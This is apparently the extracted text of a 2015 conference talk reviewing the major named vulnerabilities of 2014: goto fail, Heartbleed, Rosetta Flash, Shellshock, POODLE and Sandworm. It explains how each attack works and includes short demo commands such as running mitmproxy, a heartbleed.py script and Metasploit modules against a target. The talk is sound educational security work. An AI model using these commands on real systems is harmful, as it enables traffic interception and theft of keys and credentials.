2014 – Year of Broken Name Generator(s)

2014 – Year of Broken
Name Generator(s)
Miroslav Štampar
(mstampar@zsis.hr)
2014 – Year of Broken
Name Generator(s)
Miroslav Štampar
(mstampar@zsis.hr)

FER 2015, Zagreb (Croatia) January 16th, 2015 2
Introduction(.jpg)

goto fail (1)
CVE-2014-1266 (6.8)
Discovered by @CrowdStrike by reverse
engineering security update for iOS (7.0.6)
Public disclosure on February 21, 2014
SSL/TLS vulnerability in iOS and OS X
Signature is inaccurately being verified in
ServerKeyExchange message
Allows MiTM attacks with full transparent
interception of HTTPS traffic
The bug has been in the wild for more than a year
Later, a similar bug has been found in GnuTLS

goto fail (2)
Attacker has to be in position to intercept and
change traffic between victim and target (MiTM)
Attacker sends fake (chosen) Diffie-Hellman
parameters to victim, along with valid server's
certificate and forced Ephemeral Diffie Hellman
(EDH/DHE) cipher suite – triggering vulnerable
code
Provided parameters' signature is not properly
being checked against server's certificate
Allows attacker to generate same session key(s) as
the client (purpose of Diffie-Hellman)
Once the secure connection is established between
victim and attacker, attacker plays MiTM proxy role

goto fail (3)
Vulnerable piece of code:

goto fail (4)
 mitmproxy --ciphers="DHE-RSA-AES256-SHA"
--cert-forward

Heartbleed (1)
CVE-2014-0160 (5.0)
Discovered independently by Neel Mehta
(@Google) and @Codenomicon in rough the same
time (while bug was there for years :)
Public disclosure on April 7, 2014
OpenSSL's (1.0.1 before 1.0.1g) TLS heartbeat
extension (RFC6520) buffer over-read vulnerability
Allows attackers to retrieve private cryptographic
keys and private user data
It is estimated that 24-55% HTTPS servers in Alexa
Top 1 Million were initially vulnerable

Heartbleed (2)
Heartbeat extension provides a mean to test and
keep alive the secure communication connections
“Heartbeat Request” message is being sent
consisting of a payload (typically a text value),
while the receiver has to send exactly the same
payload back to sender
Message returned is based on length field (max.
64KB in case of attack) in the requesting message,
without properly checking the actual payload's
length (e.g. “foobar”)

Heartbleed (3)
Response consists of payload, followed by
whatever else happened to be in the allocated
memory buffer (in case of faked payload length)
Attack is performed repeatedly in hope to read a
chunk previously used by OpenSSL (e.g. server
private key, session cookies, credentials, etc.)
OpenSSL uses custom memory allocator making
exploitation far easier (non-random/reusable
memory chunks are being allocated)
Lots of criticism followed, especially against
OpenSSL's “sloppy coding” style (e.g. LibreSSL
developers removed half of the OpenSSL source
tree in a week)

Heartbleed (4)

Heartbleed (5)
 python heartbleed.py www.target.com

Rosetta Flash (1)
CVE-2014-4671 (6.8) and CVE-2014-5333 (6.8)
Discovered by Michele Spagnuolo (@Google)
Public disclosure on July 8, 2014
JSONP (JSON with padding) is a communication
technique used in JavaScript programs to request
data from a server in a different domain
Basically, it's a script tag injection method passing
the response from the server in to a user specified
function “callback” (different domain context)
Website with a JSONP endpoint accepting only
alphanumeric callback (for security reasons) can be
abused (against client's Adobe Flash Player) with
specially crafted SWF files

Rosetta Flash (2)
It can be used to serve (echo back) a provided
malicious alphanumeric SWF object that steals the
content(s) of a same-domain URL inside user's
browser
SWF (Flash) file is executed in context of the target
domain, so CSRF (Cross-Site Request Forgery)
attack can be performed
Required “patching” at both client(s) side (Adobe
Flash Player 14.0.0.176) and at the server side for
successful mitigation
Many high profile sites were affected (Google,
Youtube, Twitter, LinkedIn, Yahoo, eBay, Flickr,
Baidu, Instagram, Tumblr, etc.)

Rosetta Flash (3)
Vulnerable JSONP sample application:
Sample malicious alphanumeric SWF:

Rosetta Flash (4)
Sample malicious web page:

Rosetta Flash (5)
 msfconsole (flash_rosetta_jsonp_url_disclosure)

Shellshock (1)
CVE-2014-6271 (10.0), CVE-2014-6277 (10.0), CVE-
2014-6278 (10.0), CVE-2014-7169 (10.0), CVE-
2014-7186 (10.0) and CVE-2014-7187 (10.0)
Discovered by Stéphane Chazelas
Public disclosure on September 24, 2014
Remote code execution through Bash
Many *nix and *BSD Internet-facing systems
expose Bash to client requests (e.g. HTTP (CGI),
DHCP, SSH, CUPS, etc.)
Bash supports exporting not just shell variables,
but also shell functions to other bash instances

Shellshock (2)
Sample function definition in Bash:
Commands are unintentionally being executed (on
vulnerable machine) when concatenated to
function definitions stored as environment
variables:

Shellshock (3)
HTTP requests to CGI scripts have been identified
as the major attack vector
The CGI specification maps all parts of requests to
environment variables (e.g. Host header to
$REMOTE_HOST variable)
CGI programs written in Perl, PHP, Python, Ruby
and Bash itself are potentially vulnerable
Sample vulnerable script:

Shellshock (4)
Sample attack:

POODLE (1)
CVE-2014-3566 (4.3)
Discovered by Bodo Möller, Thai Duong and
Krzysztof Kotowicz (@Google)
Public disclosure on October 14, 2014
“Padding Oracle On Downgraded Legacy
Encryption”
Padding Oracle attack against CBC mode of
operation in SSL 3.0 (exploiting same flaw as in
BEAST attack)
In case of TLS usage, forced version downgrade
from TLS to SSL 3.0 MiTM attack is performed
Major browsers voluntary downgrade to SSL 3.0 if
TLS handshakes fail

POODLE (2)
SSL 3.0 (deprecated 15 years ago) uses non-
deterministic CBC padding, which makes padding
oracle attacks possible in MiTM environment
Padding is performed to make input plaintext
length equal to a multiple of the cipher's block size
(e.g. 8 bytes in case of 3DES and 16 bytes in case
of AES)
SSL 3.0 adds padding filled with single byte
denoting the length of padding itself
In padding oracle attack server leaks data whether
the padding of an encrypted message is correct or
not

POODLE (3)
CBC mode decryption:

POODLE (4)
In POODLE attack presumption is that victim runs
malicious Javascript in a browser which causes the
browser to make attacker controlled requests (with
cookies) to the origin of interest (e.g. google.com)
Attacker intercepts one such controlled encrypted
request, takes block which contains value of
interest (e.g. one “shifted” cookie byte followed by
spaces), replaces last (padding) block with its
content and forwards it to the server
If server doesn't drop such “skewed” request, it can
be concluded that the last byte of decrypted block
that was duplicated, XORed with the ciphertext of
the previous block, equals to the known padding
block

Sandworm (1)
CVE-2014-4114 (9.3)
Identified by @iSIGHT from same named “cyber-
attack” campaign
Public disclosure on October 15, 2014
Microsoft Windows OLE arbitrary code execution
Windows Vista SP2, Windows 7/8, Windows Server
2008/2012 are known to be vulnerable
Problem lies in how Object Packager 2 component
(packager.dll) handles an INF file that contains
malicious registry changes (e.g. RunOnce)
INF can't be loaded (and executed) directly but can
be forced by embedding the file path as a remote
share in an OLE object

Sandworm (2)
 msfconsole (ms14_060_sandworm)

Sandworm (3)

Questions?

2014 – Year of Broken Name Generator(s)

More Related Content

What's hot

Viewers also liked

Similar to 2014 – Year of Broken Name Generator(s)

More from Miroslav Stampar

2014 – Year of Broken Name Generator(s)